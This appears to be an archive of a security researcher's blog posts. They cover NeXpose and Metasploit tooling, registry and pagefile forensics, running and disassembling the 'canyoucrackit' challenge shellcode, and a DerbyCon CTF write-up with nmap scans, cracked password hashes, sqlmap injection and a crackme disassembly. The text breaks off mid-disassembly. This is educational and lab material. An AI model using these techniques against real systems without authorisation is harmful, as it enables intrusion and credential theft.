Volatile Minds

Communicating with your NeXpose server via Mono/.NET

2012-01-11T16:09:00.001-06:00

I have a public repo on github that houses my nexpose-sharp library. It is written in C# and consumes the NeXpose XML API (both 1.1 and 1.2). Here is an example of how easy it is to get all the vuln checks NeXpose has:



using System;

using System.Xml;

using nexposesharp;



namespace nexposeclient

{

class MainClass

{

public static void Main (string[] args)

{

using (NexposeSession session = new NexposeSession("192.168.56.101"))

{

session.Authenticate("nexpose"/*user*/, "nexpose"/*password*/);



using (NexposeManager11 manager = new NexposeManager11(session))

{

XmlDocument vulns = manager.GetVulnerabilityListing();



int i = 0;

foreach (XmlNode vuln in vulns.FirstChild.ChildNodes)

{

string vulnID = vuln.Attributes["id"].Value;



XmlDocument deets = manager.GetVulnerabilityDetails(vulnID);



string title = deets.FirstChild.FirstChild.Attributes["title"].Value;

string severity = deets.FirstChild.FirstChild.Attributes["severity"].Value;



Console.WriteLine(String.Format("{0} has a severity of {1} and an id of {2}", title, severity, vulnID)); 



i++;

}



Console.WriteLine("\n\nTotal vulnerabilities in database: " + i);

}

}

}

}

}

The library has 2 manager implementations. The above example use the 1.1 API. A NexposeManager12 class exists that inherits from NexposeManager11 (available from NeXpose 4.0) and implements the extended 1.2 API (available for NeXpose installations of 4.8+). I am currently in the process of writing some unit tests, which will be committed as soon as possible.

You can grab a copy of NeXpose Community Edition today and try it out!

Reading offline registry hives in pure ruby

2012-01-06T12:31:00.000-06:00

If you have ever wanted to peruse a registry hive on Linux, you know that options are really lacking. Most people wonder why you would even want to read a registry hive on Linux, but it is fairly straightforward when you think of the kind of people who will be traversing through registry hives in the first place. Forensics and reverse engineers will often run Linux.

Last night, I checked in my offline registry hive library written in Ruby. I had written a really crappy one in C# based on key signatures, rather than parsing the actual tree. This library does it correctly, by parsing the tree. It is still in its infancy, but it works well enough. You may view the code here. One day, I hope this gets merged in to the Metasploit trunk in some form or fashion. Tested on Ubuntu 11.10 on ruby 1.9.2p290 (2011-07-09 revision 32553) [x86_64-linux].

root@w00den-pickle:/home/bperry/tmo/hives/ntreg-ruby# ruby ntreg.rb '\Select' ../SYSTEM
Hive name: "SYSTEM"
Found root key: CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
The values and data of \CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}\Select are:
"Current: \x01\x00\x00\x00"
"Default: \x01\x00\x00\x00"
"Failed: \x00\x00\x00\x00"
"LastKnownGood: \x02\x00\x00\x00"
root@w00den-pickle:/home/bperry/tmo/hives/ntreg-ruby# ruby ntreg.rb '\ControlSet001\Control\Lsa' ../SYSTEM
Hive name: "SYSTEM"
Found root key: CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
The children of \CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}\ControlSet001\Control\Lsa are:
"AccessProviders"
"Audit"
"Credssp"
"Data"
"FipsAlgorithmPolicy"
"GBG"
"JD"
"Kerberos"
"MSV1_0"
"Skew1"
"SSO"
"SspiCache"
The values and data of \CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}\ControlSet001\Control\Lsa are:
"auditbaseobjects: \x00\x00\x00\x00"
"auditbasedirectories: \x00\x00\x00\x00"
"crashonauditfail: \x00\x00\x00\x00"
"fullprivilegeauditing: \x00\x00\x00\x00"
"Bounds: \x000\x00\x00\x00 \x00\x00"
"LimitBlankPasswordUse: \x01\x00\x00\x00"
"NoLmHash: \x01\x00\x00\x00"
"Notification Packages: s\x00c\x00e\x00c\x00l\x00i\x00\x00\x00\x00\x00"
"Security Packages: k\x00e\x00r\x00b\x00e\x00r\x00o\x00s\x00\x00\x00m\x00s\x00v\x001\x00_\x000\x00\x00\x00s\x00c\x00h\x00a\x00n\x00n\x00e\x00l\x00\x00\x00w\x00d\x00i\x00g\x00e\x00s\x00t\x00\x00\x00t\x00s\x00p\x00k\x00g\x00\x00\x00p\x00k\x00u\x002\x00u\x00\x00\x00\x00\x00"
"Authentication Packages: m\x00s\x00v\x001\x00_\x000\x00\x00\x00\x00\x00"
"LsaPid: \xEC\x01\x00\x00"
"SecureBoot: \x01\x00\x00\x00"
"ProductType: \x02\x00\x00\x00"
"disabledomaincreds: \x00\x00\x00\x00"
"everyoneincludesanonymous: \x00\x00\x00\x00"
"forceguest: \x00\x00\x00\x00"
"restrictanonymous: \x00\x00\x00\x00"
"restrictanonymoussam: \x01\x00\x00\x00"
root@w00den-pickle:/home/bperry/tmo/hives/ntreg-ruby#

New metasploit modules in trunk

2011-12-28T16:40:00.000-06:00

Last night HDM checked in a telnetd remote root scanner and exploit module fore BSD-derived telnetd servers (this vuln affects telnet clients as well). We were up late last night working on it. Any testing is appreciated.

Today, sinn3r checked my CorpWatch API modules into trunk. These aid in OSINT research for a company during an engagement.

Finding all exploits with RPORT == X

2011-12-13T20:53:00.000-06:00

This question comes up quite a bit in the IRC channel: How can I see all exploits for a given port? You can do it easily with IRB

msf > irb
>> framework.exploits.each_module { |n,e| x=e.new; print_good("#{e.fullname}: #{x.datastore['RPORT']}") if x.datastore['RPORT'].to_i == 445   }; nil

Just replace 445 with the port you are looking for. If you want aux modules, you may replace framework.exploits with framework.auxiliary.

Can you crack it? (nope, I tried though)

2011-11-30T23:38:00.000-06:00

The UK govt created a challenge to find eligible code crackers. The website is http://www.canyoucrackit.co.uk/.

I got close, but my skills aren't up to par. Here is as far as I got. They give you the following code:

eb 04 af c2 bf a3 81 ec  00 01 00 00 31 c9 88 0c
0c fe c1 75 f9 31 c0 ba  ef be ad de 02 04 0c 00
d0 c1 ca 08 8a 1c 0c 8a  3c 04 88 1c 04 88 3c 0c
fe c1 75 e8 e9 5c 00 00  00 89 e3 81 c3 04 00 00
00 5c 58 3d 41 41 41 41  75 43 48 3d 42 42 42 42
75 3b 5a 89 d1 89 e6 89  df 29 cf f3 a4 89 de 89
d1 89 df 29 cf 31 c0 31  db 31 d2 fe c0 02 1c 06
8a 14 06 8a 34 1e 88 34  06 88 14 1e 00 f2 30 f6
8a 1c 16 8a 17 30 da 88  17 47 49 75 de 31 db 89
d8 fe c0 cd 80 90 90 e8  9d ff ff ff 41 41 41 41

What jumps out at me first are the nops (90 90) in the last line. My mind automagically tells me this is shellcode. I wasn't 100% sure, but it was the only guess I had. I copied the code over into gedit, and made the following adjustments.

\xeb\x04\xaf\xc2\xbf\xa3\x81\xec\x00\x01\x00\x00\x31\xc9\x88\x0c
\x0c\xfe\xc1\x75\xf9\x31\xc0\xba\xef\xbe\xad\xde\x02\x04\x0c\x00
\xd0\xc1\xca\x08\x8a\x1c\x0c\x8a\x3c\x04\x88\x1c\x04\x88\x3c\x0c
\xfe\xc1\x75\xe8\xe9\x5c\x00\x00\x00\x89\xe3\x81\xc3\x04\x00\x00
\x00\x5c\x58\x3d\x41\x41\x41\x41\x75\x43\x48\x3d\x42\x42\x42\x42
\x75\x3b\x5a\x89\xd1\x89\xe6\x89\xdf\x29\xcf\xf3\xa4\x89\xde\x89
\xd1\x89\xdf\x29\xcf\x31\xc0\x31\xdb\x31\xd2\xfe\xc0\x02\x1c\x06
\x8a\x14\x06\x8a\x34\x1e\x88\x34\x06\x88\x14\x1e\x00\xf2\x30\xf6
\x8a\x1c\x16\x8a\x17\x30\xda\x88\x17\x47\x49\x75\xde\x31\xdb\x89
\xd8\xfe\xc0\xcd\x80\x90\x90\xe8\x9d\xff\xff\xff\x41\x41\x41\x41

I then saved this into a shellcode.c file:

char shellcode[] = "\xeb\x04\xaf\xc2\xbf\xa3\x81\xec\x00\x01\x00\x00\x31\xc9\x88\x0c\x0c\xfe\xc1\x75\xf9\x31\xc0\xba\xef\xbe\xad\xde\x02\x04\x0c\x00\xd0\xc1\xca\x08\x8a\x1c\x0c\x8a\x3c\x04\x88\x1c\x04\x88\x3c\x0c\xfe\xc1\x75\xe8\xe9\x5c\x00\x00\x00\x89\xe3\x81\xc3\x04\x00\x00\x00\x5c\x58\x3d\x41\x41\x41\x41\x75\x43\x48\x3d\x42\x42\x42\x42\x75\x3b\x5a\x89\xd1\x89\xe6\x89\xdf\x29\xcf\xf3\xa4\x89\xde\x89\xd1\x89\xdf\x29\xcf\x31\xc0\x31\xdb\x31\xd2\xfe\xc0\x02\x1c\x06\x8a\x14\x06\x8a\x34\x1e\x88\x34\x06\x88\x14\x1e\x00\xf2\x30\xf6\x8a\x1c\x16\x8a\x17\x30\xda\x88\x17\x47\x49\x75\xde\x31\xdb\x89\xd8\xfe\xc0\xcd\x80\x90\x90\xe8\x9d\xff\xff\xff\x41\x41\x41\x41";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

   printf("done");

}

Running it simply returned the "done" being printed by printf. This told me that the shellcode was at least not crashing, so it was probably valid shellcode. Looks like my first impression was correct. So I jumped to the asm that the shellcode produced to get a better understanding of it:

0000000000601040 :
  601040: eb 04                 jmp    601046 
  601042: af                    scas   %es:(%rdi),%eax
  601043: c2 bf a3              retq   $0xa3bf
  601046: 81 ec 00 01 00 00     sub    $0x100,%esp
  60104c: 31 c9                 xor    %ecx,%ecx
  60104e: 88 0c 0c              mov    %cl,(%rsp,%rcx,1)
  601051: fe c1                 inc    %cl
  601053: 75 f9                 jne    60104e 
  601055: 31 c0                 xor    %eax,%eax
  601057: ba ef be ad de        mov    $0xdeadbeef,%edx
  60105c: 02 04 0c              add    (%rsp,%rcx,1),%al
  60105f: 00 d0                 add    %dl,%al
  601061: c1 ca 08              ror    $0x8,%edx
  601064: 8a 1c 0c              mov    (%rsp,%rcx,1),%bl
  601067: 8a 3c 04              mov    (%rsp,%rax,1),%bh
  60106a: 88 1c 04              mov    %bl,(%rsp,%rax,1)
  60106d: 88 3c 0c              mov    %bh,(%rsp,%rcx,1)
  601070: fe c1                 inc    %cl
  601072: 75 e8                 jne    60105c 
  601074: e9 5c 00 00 00        jmpq   6010d5 
  601079: 89 e3                 mov    %esp,%ebx
  60107b: 81 c3 04 00 00 00     add    $0x4,%ebx
  601081: 5c                    pop    %rsp
  601082: 58                    pop    %rax
  601083: 3d 41 41 41 41        cmp    $0x41414141,%eax
  601088: 75 43                 jne    6010cd 
  60108a: 48 3d 42 42 42 42     cmp    $0x42424242,%rax
  601090: 75 3b                 jne    6010cd 
  601092: 5a                    pop    %rdx
  601093: 89 d1                 mov    %edx,%ecx
  601095: 89 e6                 mov    %esp,%esi
  601097: 89 df                 mov    %ebx,%edi
  601099: 29 cf                 sub    %ecx,%edi
  60109b: f3 a4                 rep movsb %ds:(%rsi),%es:(%rdi)
  60109d: 89 de                 mov    %ebx,%esi
  60109f: 89 d1                 mov    %edx,%ecx
  6010a1: 89 df                 mov    %ebx,%edi
  6010a3: 29 cf                 sub    %ecx,%edi
  6010a5: 31 c0                 xor    %eax,%eax
  6010a7: 31 db                 xor    %ebx,%ebx
  6010a9: 31 d2                 xor    %edx,%edx
  6010ab: fe c0                 inc    %al
  6010ad: 02 1c 06              add    (%rsi,%rax,1),%bl
  6010b0: 8a 14 06              mov    (%rsi,%rax,1),%dl
  6010b3: 8a 34 1e              mov    (%rsi,%rbx,1),%dh
  6010b6: 88 34 06              mov    %dh,(%rsi,%rax,1)
  6010b9: 88 14 1e              mov    %dl,(%rsi,%rbx,1)
  6010bc: 00 f2                 add    %dh,%dl
  6010be: 30 f6                 xor    %dh,%dh
  6010c0: 8a 1c 16              mov    (%rsi,%rdx,1),%bl
  6010c3: 8a 17                 mov    (%rdi),%dl
  6010c5: 30 da                 xor    %bl,%dl
  6010c7: 88 17                 mov    %dl,(%rdi)
  6010c9: 47                    rex.RXB
  6010ca: 49 75 de              rex.WB jne    6010ab 
  6010cd: 31 db                 xor    %ebx,%ebx
  6010cf: 89 d8                 mov    %ebx,%eax
  6010d1: fe c0                 inc    %al
  6010d3: cd 80                 int    $0x80
  6010d5: 90                    nop
  6010d6: 90                    nop
  6010d7: e8 9d ff ff ff        callq  601079 
  6010dc: 41                    rex.B
  6010dd: 41                    rex.B
  6010de: 41                    rex.B
  6010df: 41 00 00              add    %al,(%r8)

Definitely legitimate shellcode. The x86 asm gcc spits out is exactly what I wanted to see. Not only that, but do you see the 0xdeadbeef?

Once I knew I was in the right direction, I loaded the binary into gdb. I through a breakpoint on the printf line with

break printf

and ran the binary. I looked at the stack frame, traversed through the memory and found the strings I suspected were what we were supposed to be looking for. However, they seemed to be all multi-byte characters. I wasn't able to decipher any of them within the time limit. I had found out about the contest about 2 hours before it was over. This took me about an hour to get to traversing the stack for the strings, and I got stuck.

Oh well. Maybe next time if I have more time I can get a bit further.

Easily splitting and storing traceroute data

2011-11-26T12:58:00.001-06:00

Traceroute is very useful, but the data it spits out can be a bit tough to chew on. I came up with this one-liner to make it more CSV compatible so you can Split() on commas and have the correct data where you expect it.

traceroute google.com | sed 's/  /,/g' | sed 's/ ms / ms,/g'

This take load balancers into account as well, so when your route slightly changes during a hop, you can still easily grok the data coming back. Basically, take double-spaces and replace them with a comma. The second sed is what takes the load balancers into account, fixing the output so it is the same as the prior hop test.

My NHibernate Configuration for Mono and PostgreSQL

2011-11-22T14:49:00.004-06:00

I love C#. It is by far my favorite language. I have been using mono to write C# application on linux for a few years now.

Ruby is growing on me, but only because of Metasploit. I wouldn't even bother with Ruby if it weren't for MSF. Generally, I switch back and forth between C# and Ruby (and, coincidentally, Monodevelop and vim respectively) a few times a day, or even going at both at the same time.

One of my personal projects requires a lot of DB stuff. At a previous job, I was introduced to NHibernate, this is by far the easiest way to manage your DB objects within your code. While this job was Windows centric (MSSQL, visual studio, etc...), I have adapted what I learned to Linux as well. I like PostgreSQL more than I like MySQL, and am very happy that NHibernate supports this dialect. It wasn't straight forward, though, figuring out the exact details. Maybe this will help someone in the same boat I am in.

The most important thing is you hibernate.hbm.xml. This is where you SQL connection string is, and where you tell NHibernate what dialect of SQL you are using:

<?xml version="1.0" encoding="utf-8"?>
<hibernate-configuration  xmlns="urn:nhibernate-configuration-2.2" >
    <session-factory>
        <property name="connection.provider">NHibernate.Connection.DriverConnectionProvider</property>
        <property name="connection.driver_class">NHibernate.Driver.NpgsqlDriver</property>
        <property name="connection.connection_string">
            Server=192.168.1.156;Port=5432;Database=pgdb;User Id=postgres;Password=postgres;SSL=true;
        </property>
        <property name="dialect">NHibernate.Dialect.PostgreSQL82Dialect</property>
  <property name='proxyfactory.factory_class'>NHibernate.ByteCode.LinFu.ProxyFactoryFactory, NHibernate.ByteCode.LinFu</property>
    </session-factory>
</hibernate-configuration>

This requires Npgsql.dll, which runs with Mono just fine. The small detail that caused me much stress early on was the dialect property name.

<property name="dialect">NHibernate.Dialect.PostgreSQL82Dialect</property>

At first, I was missing the "82" in the middle of the dialect name. This defaults to PostgreSQL 7.4. I am running 8.4, and there were incompatibilities that caused issues. After a day or two, I finally figured out what was causing my problems.

I hope this helps others.

Metasploit and the Penetration Testing Execution Standard

2011-11-15T22:34:00.001-06:00

I was recently asked to map out the Metasploit Framework's functionality with the PTES.

Have a look at the whitepaper, if you are interested in Metasploit or network security, it should be a great read.

www.tinyurl.com/msf-ptes

CorpWatch API integration with Metasploit: Information Gathering

2011-11-12T18:14:00.002-06:00

I have submitted two modules today to the Metasploit redmine that allow integration of the CorpWatch API. They are very neat modules, allowing you to bring in information from SEC EDGAR straight into Metasploit without leaving the console. You can find and research parent and child companies, view past addresses, past names, SEC filings, all sorts of valuable information with gathering information on a company during an engagement.

Here is an example run: http://pastebin.com/d9MKjiQ2

Hopefully these modules will hit trunk soon, but if you want to play with them now, the diff is taken from the framework root.

On Information Leakage/Disclosure and Responsibilty

2011-10-10T17:30:00.000-06:00

I enjoy helping people. I enjoy helping them learn, and helping them not make mistakes. Sometimes, however, I find mistakes people have made and am told to walk away from them.

Whenever I find a security hole in a website, I don't always have permission to look at it and exploit it. I _never_ do damage to systems I find security holes in. I tell the appropriate people what I have found, how I found it, how to resolve it, and make sure they understand I had no ill intent.

I have found security holes (usually SQL injections) in very large website that deal with customer data, online shopping, etc. I have even found SQL injections in government websites. I am told by seasoned professionals in the security field that the best thing to do when finding these holes is to walk away and pretend like I never found them. Companies love suing people, and governments love imprisoning people.

I feel like this is completely irresponsible. It is absolutely contrary to what I was taught growing up. If I can help a company out by pinpointing their flaws before an attacker does, I should not fear being sued or imprisoned. I consider it a matter of Good Samaritanism. You don't imprison or sue those trying to help you.

Analyzing the Windows pagefile.sys from GNU/Linux

2011-10-04T18:34:00.000-06:00

Problem: Given a pagefile.sys, how much information can you gain about the victim?

Hints: The pagefile.sys is stored as a bunch of 4k blocks. It is "virtual memory".


strings pagefile.sys | grep -i "^[a-z]:\\\\" | sort | uniq | less #List all paths in pagefile

NOTE: You could find a lot of paths referencing "d:\nt\base\random\path\to\src.c". These seem to be related to the drivers being loaded into memory and being pushed to the pagefile.

---------------


strings pagefile.sys | grep -i "^[a-zA-Z09_]*=.*" | sort -u | uniq | less #print env vars

You will invariably get a lot of false positives with this one. But a lot of good information as well.

----------------


strings pagefile.sys | egrep '([[:alnum:]_.-]{1,64}+@[[:alnum:]_.-]{2,255}+?\.[[:alpha:].]{2,4})' #print all email addresses.

There is a lot of good information that can be found that regular expressions simply can't pick up (or I just didn't think of).

-----------

One thing you can do to help protect youself is looking at this kb on how to wipe your pagefile on shutdown. A simple registry tweak is all it takes.

If you have shell on the victim, using meterpreter you can find out the values of this key using this:


reg enumkey -k 
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session\ Manager\\Memory Management

FTA:

Change the data value of the ClearPageFileAtShutdown value in the following registry key to a value of 1:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
If the value does not exist, add the following value:
Value Name: ClearPageFileAtShutdown
Value Type: REG_DWORD
Value: 1

DerbyCon CTF Results and Notes

2011-10-03T11:45:00.000-06:00

This weekend I attended DerbyCon, a hacker convention being held for its first time in Louisville, Kentucky. It had great talks by industry heavyweights in security, and a really awesome and fun CTF game. Initially, I wasn't even planning on playing the CTF. I had never done anything like the CTF before, and expected to be trounced. As it turns out though, a friend of mine, TheLightCosine, and I were bored and decided to check it out. TheLightCosine was actually taking Win32 exploit development training from corelanc0der and wasn't able to compete very much. Even when not in training, his brain was fried. The training was a bootcamp. With some help from TheLightCosine, however, I was able to place 5th on the CTF. Next year, I plan to be more organized and take the game a bit more seriously. All the notes I list here were just kept in my head, so I may miss a few things. This is also an abridged version.

The rules were simple. A small network was setup (derbycon_ctf) with no internet connection. There were two public targets that you were allowed to hack on (10.1.1.15,10.1.1.16), and one public target that was off limits (10.1.1.10). The latter was where the scoreboard resided and where you submitted your flags for your points.

The first thing I did when joining was nmapping the two targets that we were allowed to hack.


nmap -sS -O -PN -PU 10.1.1.15,16

This gave me an initial idea of what services the boxen were running. 10.1.1.15 had ports 80, 13370, and 3389. 10.1.1.16 was running 21,80,443, and 3389. Both were windows 2003 boxes. Occasionally, ports 23, 25, and 1337 would open on 10.1.1.16. This really confused me, but I assumed right off the bat that they were actually netcat listeners. I was never able to connect to one as someone always found them before I did. During the closing ceremonies, when the CTF prizes were given out, my assumption was confirmed by the CTF admins. They were netcat listeners.

One of the most important stages when hacking into machines like this is simple information gathering. We have HTTP/S ports, we have FTP, and we have MS Terminal Services. It turns out that port 13370 on 10.1.1.15 is also HTTP. The SSL Certificate for the HTTPS port on 10.1.1.16 was invalid, something to note for later use.

First things first, I hit up the ftp port. 'Lo and behold, a flag was waiting for me in the banner (Flag=AnonymousFTP). Logging in I found about 10 or so files on the ftp and two folders. One folder was locked down, I couldn't get in. The other, however, contained a text file with usernames and hashes. Other files on the root of the ftp were firefox databases for saved credentials, an .NET exe that you were required to reverse engineer (I almost figured this one out), a pcap file, and a file with a .docx extension (though it is just a plain text file). I downloaded these files to a local folder for later processing. My first action was to crack those hashes I found on the ftp server. I used john for this.


root@gits-and-shiggles:/home/upgraydd/Pictures/hidden# john --show secretdata
Administrator:NO PASSWORD:500:28361B9A6A28663E73EB37AA1787B284:::
derbycon:KENTUCKY:1012:8CFC8328E285BAE5702FB32AE7C95F87:::
ftpuser:FTP1:1013:2AED8B7C119F79B4F81D3FF9EB1760F3:::
jamesbond:007:1015:0B0412D8761239A73143EFAE928E9F0A:::
root:TOOR:1014:AFC44EE7351D61D00698796DA06B1EBF:::
sqldb:NO PASSWORD:1007:9CB9DCE36C9566A195A42282ADC6A404:::
texasranger:CHUCKNORRIS:1016:167A7A68DEA1D4FBD7B3F4F444690F24:::

9 password hashes cracked, 0 left
root@gits-and-shiggles:/home/upgraydd/Pictures/hidden#

This gave me credentials to work with now. None of these creds allowed me to get into the locked folder on ftp like I expected. I set these aside for later use. Once I had these, I decided to take a look at the terminal services ports. I used tsclient to connect to both 10.1.1.15 and 10.1.1.16. This gave a me a flag, but none of my credentials worked to log in. The flag, interestingly enough, was WasteOfTime. I decided to start perusing the http ports next.

10.1.1.16:80 gave two flags actually. One in the title of the index page, and one as an HTML comment. Super easy stuff. 10.1.1.16:80 also gives you a url to 10.1.1.15:13370/upload/upload.aspx. I wasn't able to break this script and get the flag I wanted.

Before I forget, one of the files on the FTP root was a file called qr.jpg. opening this up and reading the qr code with my phone yielded a flag. Dumping the exif data showed and interesting sup3rs3cr3tk3y string, apparently this was a flag, but it was not as apparent as the rest. When I found this out, I /headdesk'ed.

If you go to the HTTP root of 10.1.1.15:13370, you find a replica of the derbycon.com website. It is slightly altered however, a few flags are thrown around inside and in cookies. There is also a new News page, which I figured out a sql injection for to receive another flag. Thankfully, TheLightCosine showed me how to save the post request with the sql injection via burpsuite and pass the request to sqlmap. This was a gold mine, giving me many more flags. I missed one however, and I have no idea where it would have been. It also turns out the version of sqlmap in the Ubuntu repos is very old. I needed to download the latest release from sourceforge in order to use this functionality (the -r flag in sqlmap). Also on this news page was an HTML comment with some credentials. I found this very early on and tried it on the FTP with no success. This bothered me because the credentials were ftpuser:ThisWillGetYouIn. It turns out the admins mistyped the username. It was supposed to be ftpadmin:ThisWillGetYouIn. Once they realised what happened, they updated the scoreboard with some vague information about an FTP credential on the site being fixed. I saw this, went back and grabbed the new creds. This worked on the FTP and got me into the folder I was not allowed in earlier. Inside the folder was a textfile with another flag.

I also remembered at this point I had yet to look at the robots.txt file on any of the web servers. This also led to two flags being found. One in the robots.txt file itself, and one that was referenced by the robots.txt.

While I let sqlmap dump what it found, I decided to go ahead and look at the files I got off ftp one more time. Three files jumped out at me. signons.sqlite, cert8.db and keey3.db. These files are how Firefox stores its stored credentials. I don't use firefox, and actually uninstalled it quite a long time ago off my netbook. I installed it, dropped the files into my user profile, went to Properties > Security > Show passwords in firefox and got another flag.

One thing I found in the /download folder of 10.1.1.15:13370 was a testkey.pem.txt. This was a private key. The pcap file on the ftp had SSL traffic in it, so TheLightCosine showed me how to decrypt the SSL traffic in the pcap file through wireshark. Once decrypted we found another flag. However, I felt like there was more to this pcap file than met the eye. I ran the pcap file through strings and ended up finding yet another flag.

At this point, I felt like I had exhausted the web servers for clues. I decided to run nikto on each port offering HTTP on both 10.1.1.15 and 10.1.1.16. This yielded a flag in the SSL cert and a vulnerable version of FCKeditor which I was unable to pop. During the closing ceremonies, the admins also showed us a file that nobody had gotten. A web.config.txt was sitting on the root of one of the web servers.

At this point, I turned my attention to the .NET exe. I was able to use mono to run it.


root@gits-and-shiggles:/home/upgraydd/Pictures# mono fu.exe 
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
No flag for you.
root@gits-and-shiggles:/home/upgraydd/Pictures#

I decided to see what happened when I passed it an argument.


root@gits-and-shiggles:/home/upgraydd/Pictures# mono fu.exe fdjskla
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
Try Harder N00b.
root@gits-and-shiggles:/home/upgraydd/Pictures#

Interesting, so it recognizes an argument was passed and changes its output. At this point I decided to disassemble the executable using monodis.



WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
.assembly extern mscorlib
{
  .ver 4:0:0:0
  .publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
}
.assembly extern System.Core
{
  .ver 4:0:0:0
  .publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
}
.assembly 'fu'
{
  .custom instance void [mscorlib]System.Runtime.Versioning.TargetFrameworkAttribute::.ctor(string) =  (
  01 00 29 2E 4E 45 54 46 72 61 6D 65 77 6F 72 6B   // ..).NETFramework
  2C 56 65 72 73 69 6F 6E 3D 76 34 2E 30 2C 50 72   // ,Version=v4.0,Pr
  6F 66 69 6C 65 3D 43 6C 69 65 6E 74 01 00 54 0E   // ofile=Client..T.
  14 46 72 61 6D 65 77 6F 72 6B 44 69 73 70 6C 61   // .FrameworkDispla
  79 4E 61 6D 65 1F 2E 4E 45 54 20 46 72 61 6D 65   // yName..NET Frame
  77 6F 72 6B 20 34 20 43 6C 69 65 6E 74 20 50 72   // work 4 Client Pr
  6F 66 69 6C 65                                  ) // ofile

  .custom instance void class [mscorlib]System.Reflection.AssemblyTitleAttribute::'.ctor'(string) =  (01 00 07 64 72 6F 70 70 65 72 00 00 ) // ...dropper..

  .custom instance void class [mscorlib]System.Reflection.AssemblyDescriptionAttribute::'.ctor'(string) =  (01 00 00 00 00 ) // .....

  .custom instance void class [mscorlib]System.Reflection.AssemblyConfigurationAttribute::'.ctor'(string) =  (01 00 00 00 00 ) // .....

  .custom instance void class [mscorlib]System.Reflection.AssemblyCompanyAttribute::'.ctor'(string) =  (01 00 09 4D 69 63 72 6F 73 6F 66 74 00 00 ) // ...Microsoft..

  .custom instance void class [mscorlib]System.Reflection.AssemblyProductAttribute::'.ctor'(string) =  (01 00 07 64 72 6F 70 70 65 72 00 00 ) // ...dropper..

  .custom instance void class [mscorlib]System.Reflection.AssemblyCopyrightAttribute::'.ctor'(string) =  (
  01 00 1B 43 6F 70 79 72 69 67 68 74 20 C2 A9 20   // ...Copyright .. 
  4D 69 63 72 6F 73 6F 66 74 20 32 30 31 31 00 00 ) // Microsoft 2011..

  .custom instance void class [mscorlib]System.Reflection.AssemblyTrademarkAttribute::'.ctor'(string) =  (01 00 00 00 00 ) // .....

  .custom instance void class [mscorlib]System.Runtime.InteropServices.ComVisibleAttribute::'.ctor'(bool) =  (01 00 00 00 00 ) // .....

  .custom instance void class [mscorlib]System.Runtime.InteropServices.GuidAttribute::'.ctor'(string) =  (
  01 00 24 65 34 65 37 63 61 36 63 2D 63 32 61 62   // ..$e4e7ca6c-c2ab
  2D 34 32 34 32 2D 61 33 65 35 2D 34 63 39 33 33   // -4242-a3e5-4c933
  63 37 30 65 66 62 30 00 00                      ) // c70efb0..

  .custom instance void class [mscorlib]System.Reflection.AssemblyFileVersionAttribute::'.ctor'(string) =  (01 00 07 31 2E 30 2E 30 2E 30 00 00 ) // ...1.0.0.0..

  .custom instance void class [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::'.ctor'(int32) =  (01 00 08 00 00 00 00 00 ) // ........

  .custom instance void [mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() =  (
  01 00 01 00 54 02 16 57 72 61 70 4E 6F 6E 45 78   // ....T..WrapNonEx
  63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01       ) // ceptionThrows.

  .hash algorithm 0x00008004
  .ver  1:0:0:0
}
.module fu.exe // GUID = {B3456451-E34C-4B2C-A452-4A83679B44EF}


.namespace fu
{
  .class private auto ansi beforefieldinit Program
   extends [mscorlib]System.Object
  {

    // method line 1
    .method private static  hidebysig 
           default void Main (string[] args)  cil managed 
    {
        // Method begins at RVA 0x2050
 .entrypoint
 // Code size 98 (0x62)
 .maxstack 2
 .locals init (
  string V_0,
  string V_1,
  string V_2,
  bool V_3)
 IL_0000:  ldc.i4.1 
 IL_0001:  br.s IL_0006

 IL_0003:  ldc.i4.0 
 IL_0004:  br.s IL_0006

 IL_0006:  brfalse.s IL_0008

 IL_0008:  nop 
 IL_0009:  ldstr "290e1babf4daa83eb606f0b4e02c73be"
 IL_000e:  stloc.0 
 IL_000f:  ldstr "/cqhcfUx1LO/mUsiT5fV2WijYMEDdvsi/gh214qRVPfauxChLplgBDMHScj8v/PDYt1F03x1r4FAdNe2uP9iHeAsPqcwEWzw3WTk7UN0jQ0="
 IL_0014:  stloc.1 
 IL_0015:  ldarg.0 
 IL_0016:  ldlen 
 IL_0017:  conv.i4 
 IL_0018:  ldc.i4.1 
 IL_0019:  ceq 
 IL_001b:  stloc.3 
 IL_001c:  ldloc.3 
 IL_001d:  brtrue.s IL_002d

 IL_001f:  nop 
 IL_0020:  ldstr "No flag for you."
 IL_0025:  call void class [mscorlib]System.Console::WriteLine(string)
 IL_002a:  nop 
 IL_002b:  br.s IL_0061

 IL_002d:  ldarg.0 
 IL_002e:  ldc.i4.0 
 IL_002f:  ldelem.ref 
 IL_0030:  call string class fu.Program::GetMd5Hash(string)
 IL_0035:  stloc.2 
 IL_0036:  ldloc.2 
 IL_0037:  ldloc.0 
 IL_0038:  call bool string::Equals(string, string)
 IL_003d:  stloc.3 
 IL_003e:  ldloc.3 
 IL_003f:  brtrue.s IL_004f

 IL_0041:  nop 
 IL_0042:  ldstr "Try Harder N00b."
 IL_0047:  call void class [mscorlib]System.Console::WriteLine(string)
 IL_004c:  nop 
 IL_004d:  br.s IL_0061

 IL_004f:  ldloc.1 
 IL_0050:  call void class [mscorlib]System.Console::WriteLine(string)
 IL_0055:  nop 
 IL_0056:  ldstr "Fix me :P"
 IL_005b:  call void class [mscorlib]System.Console::WriteLine(string)
 IL_0060:  nop 
 IL_0061:  ret 
    } // end of method Program::Main

    // method line 2
    .method private static  hidebysig 
           default string GetMd5Hash (string input)  cil managed 
    {
        // Method begins at RVA 0x20c0
 // Code size 90 (0x5a)
